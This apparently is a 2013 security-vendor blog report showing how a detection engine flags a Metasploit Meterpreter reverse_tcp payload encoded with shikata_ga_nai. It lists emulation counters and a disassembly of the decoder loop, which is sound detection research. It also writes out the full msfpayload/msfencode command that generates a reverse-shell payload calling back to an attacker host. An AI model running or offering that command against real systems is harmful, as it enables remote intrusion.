Monday, March 18, 2013

Quttera investigation engine scan report for Metasploit's reverse_tcp payload encoded with x86/shikata_ga_nai encoder

Quttera investigation engine statistics of the detected payload

Offset of the detected payload: 0

Payload generation command

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.111.129 LPORT=9988 R| msfencode -e x86/shikata_ga_nai -t raw

Payload emulation counters:

WRITES_TO_PROCESS_STACK_MEMORY0
BUFFER_INSIDE_WRITES_COUNT24
REFERENCES_TO_PROCESS_INTERNALS0
BUFFER_OUTSIDE_WRITES_COUNT0
FAR_JUMPS_COUNT0
FULLY_INITIALIZED_INSTRUCTIONS99
PROVIDED_ABSOLUTE_MEMORY_ADDRESSES1
PROC_CALLS_INSIDE_INV_BUFFER0
BUFFER_OUTSIDE_READS_COUNT1
UNDEFINED_DIRECT_CALLS0
JUMPS_INSIDE_INV_BUFFER23
CORRECTLY_PARSED_INSTRUCTIONS100
MEMORY_MODIFYING_MATH_INSTRUCTIONS0
BUFFER_INSIDE_READS_COUNT24
SYSTEM_CALLS_COUNT0
UNRECOGNIZED_CALL_TARGETS0
REFERENCES_TO_PROCESS_IMPORTS0
CORRECT_PROCEDURES_CALLS0
EIP_RETRIEVAL_INSTRUCTIONS1
JUMPS_TO_PROCESS_INTERNALS0
EXECUTED_ARITHMETIC_INSTRUCTIONS24
CALLS_TARGETED_IMPORTS_SECTION0
UNRECOGNIZED_JUMP_TARGETS0
CONSEQUENT_SINGLE_BYTE_INSTRUCTIONS0
REFERENCES_TO_PROCESS_EXPORTS0
EXECUTES_BITS_OPERATING_INSTRUCTIONS0
IMMEDIATE_OPERANDS_INSTRUCTIONS0
INDIRECT_BUFFER_REFERENCES23
MAX_WRITTEN_MEMORY_BLOCK0
CORRECTLY_EXECUTED_INSTRUCTIONS100
READS_FROM_PROCESS_STACK_MEMORY1
CALLS_TARGETED_EXPORTS_SECTION0

Read more about Quttera investigation engine here

Detection disassembly:

MOV EBX (0x00000000),0x7D1F6180
FCMOVB ST0 (0x0000000000000000),ST3 (0x0000000000000001)
FNSTENV [ESP - 0xC] (0x087A29DB)
POP EDX (0x00000000)
XOR ECX (0x00000000),ECX (0x00000000)
MOV CL (0x00),0x49
XOR DS:[EDX + 0x14] (0xBFC74815),EBX (0x7D1F6180) ;investigation buffer write instruction
ADD EBX (0x7D1F6180),DS:[EDX + 0x14] (0xBFC74815) ;investigation buffer read instruction
ADD EDX (0xBFC74801),0x04
LOOP 0xF5 ;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74819),EBX (0x661C5762) ;investigation buffer write instruction
ADD EBX (0x661C5762),DS:[EDX + 0x14] (0xBFC74819) ;investigation buffer read instruction
ADD EDX (0xBFC74805),0x04
LOOP 0xF5 ;random read instruction
XOR DS:[EDX + 0x14] (0xBFC7481D),EBX (0x661C57EB) ;investigation buffer write instruction
ADD EBX (0x661C57EB),DS:[EDX + 0x14] (0xBFC7481D) ;investigation buffer read instruction
ADD EDX (0xBFC74809),0x04
LOOP 0xF5 ;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74821),EBX (0x9801E14B) ;investigation buffer write instruction
ADD EBX (0x9801E14B),DS:[EDX + 0x14] (0xBFC74821) ;investigation buffer read instruction
ADD EDX (0xBFC7480D),0x04
LOOP 0xF5 ;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74825),EBX (0xEA8D461D) ;investigation buffer write instruction
ADD EBX (0xEA8D461D),DS:[EDX + 0x14] (0xBFC74825) ;investigation buffer read instruction
ADD EDX (0xBFC74811),0x04
LOOP 0xF5 ;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74829),EBX (0xF6DFD14D) ;investigation buffer write instruction
ADD EBX (0xF6DFD14D),DS:[EDX + 0x14] (0xBFC74829) ;investigation buffer read instruction
ADD EDX (0xBFC74815),0x04
LOOP 0xF5 ;random read instruction
XOR DS:[EDX + 0x14] (0xBFC7482D),EBX (0x81F423D8) ;investigation buffer write instruction
ADD EBX (0x81F423D8),DS:[EDX + 0x14] (0xBFC7482D) ;investigation buffer read instruction
ADD EDX (0xBFC74819),0x04
LOOP 0xF5 ;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74831),EBX (0x39034C4A) ;investigation buffer write instruction
ADD EBX (0x39034C4A),DS:[EDX + 0x14] (0xBFC74831) ;investigation buffer read instruction
ADD EDX (0xBFC7481D),0x04
LOOP 0xF5 ;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74835),EBX (0x38347294) ;investigation buffer write instruction
ADD EBX (0x38347294),DS:[EDX + 0x14] (0xBFC74835) ;investigation buffer read instruction
ADD EDX (0xBFC74821),0x04
LOOP 0xF5 ;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74839),EBX (0x74E132C5) ;investigation buffer write instruction
ADD EBX (0x74E132C5),DS:[EDX + 0x14] (0xBFC74839) ;investigation buffer read instruction
ADD EDX (0xBFC74825),0x04
LOOP 0xF5 ;random read instruction
XOR DS:[EDX + 0x14] (0xBFC7483D),EBX (0xA0E3AF26) ;investigation buffer write instruction
ADD EBX (0xA0E3AF26),DS:[EDX + 0x14] (0xBFC7483D) ;investigation buffer read instruction
ADD EDX (0xBFC74829),0x04
LOOP 0xF5 ;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74841),EBX (0xAEB37046) ;investigation buffer write instruction
ADD EBX (0xAEB37046),DS:[EDX + 0x14] (0xBFC74841) ;investigation buffer read instruction
ADD EDX (0xBFC7482D),0x04
LOOP 0xF5 ;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74845),EBX (0x9F963747) ;investigation buffer write instruction
ADD EBX (0x9F963747),DS:[EDX + 0x14] (0xBFC74845) ;investigation buffer read instruction
ADD EDX (0xBFC74831),0x04
LOOP 0xF5 ;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74849),EBX (0xF2218E99) ;investigation buffer write instruction
ADD EBX (0xF2218E99),DS:[EDX + 0x14] (0xBFC74849) ;investigation buffer read instruction
ADD EDX (0xBFC74835),0x04
LOOP 0xF5 ;random read instruction
XOR DS:[EDX + 0x14] (0xBFC7484D),EBX (0x2E6419A9) ;investigation buffer write instruction
ADD EBX (0x2E6419A9),DS:[EDX + 0x14] (0xBFC7484D) ;investigation buffer read instruction
ADD EDX (0xBFC74839),0x04
LOOP 0xF5 ;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74851),EBX (0x6EEFE9AA) ;investigation buffer write instruction
ADD EBX (0x6EEFE9AA),DS:[EDX + 0x14] (0xBFC74851) ;investigation buffer read instruction
ADD EDX (0xBFC7483D),0x04
LOOP 0xF5 ;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74855),EBX (0xE3B06F22) ;investigation buffer write instruction
ADD EBX (0xE3B06F22),DS:[EDX + 0x14] (0xBFC74855) ;investigation buffer read instruction
ADD EDX (0xBFC74841),0x04
LOOP 0xF5 ;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74859),EBX (0x3480706C) ;investigation buffer write instruction
ADD EBX (0x3480706C),DS:[EDX + 0x14] (0xBFC74859) ;investigation buffer read instruction
ADD EDX (0xBFC74845),0x04
LOOP 0xF5 ;random read instruction
XOR DS:[EDX + 0x14] (0xBFC7485D),EBX (0xBF98B8F7) ;investigation buffer write instruction
ADD EBX (0xBF98B8F7),DS:[EDX + 0x14] (0xBFC7485D) ;investigation buffer read instruction
ADD EDX (0xBFC74849),0x04
LOOP 0xF5 ;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74861),EBX (0x9299D94F) ;investigation buffer write instruction
ADD EBX (0x9299D94F),DS:[EDX + 0x14] (0xBFC74861) ;investigation buffer read instruction
ADD EDX (0xBFC7484D),0x04
LOOP 0xF5 ;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74865),EBX (0x1DE31632) ;investigation buffer write instruction
ADD EBX (0x1DE31632),DS:[EDX + 0x14] (0xBFC74865) ;investigation buffer read instruction
ADD EDX (0xBFC74851),0x04
LOOP 0xF5 ;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74869),EBX (0xF3E4A166) ;investigation buffer write instruction
ADD EBX (0xF3E4A166),DS:[EDX + 0x14] (0xBFC74869) ;investigation buffer read instruction
ADD EDX (0xBFC74855),0x04
LOOP 0xF5 ;random read instruction
XOR DS:[EDX + 0x14] (0xBFC7486D),EBX (0xB416A097) ;investigation buffer write instruction
ADD EBX (0xB416A097),DS:[EDX + 0x14] (0xBFC7486D) ;investigation buffer read instruction
ADD EDX (0xBFC74859),0x04
LOOP 0xF5 ;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74871),EBX (0xC1E66243) ;investigation buffer write instruction
ADD EBX (0xC1E66243),DS:[EDX + 0x14] (0xBFC74871) ;investigation buffer read instruction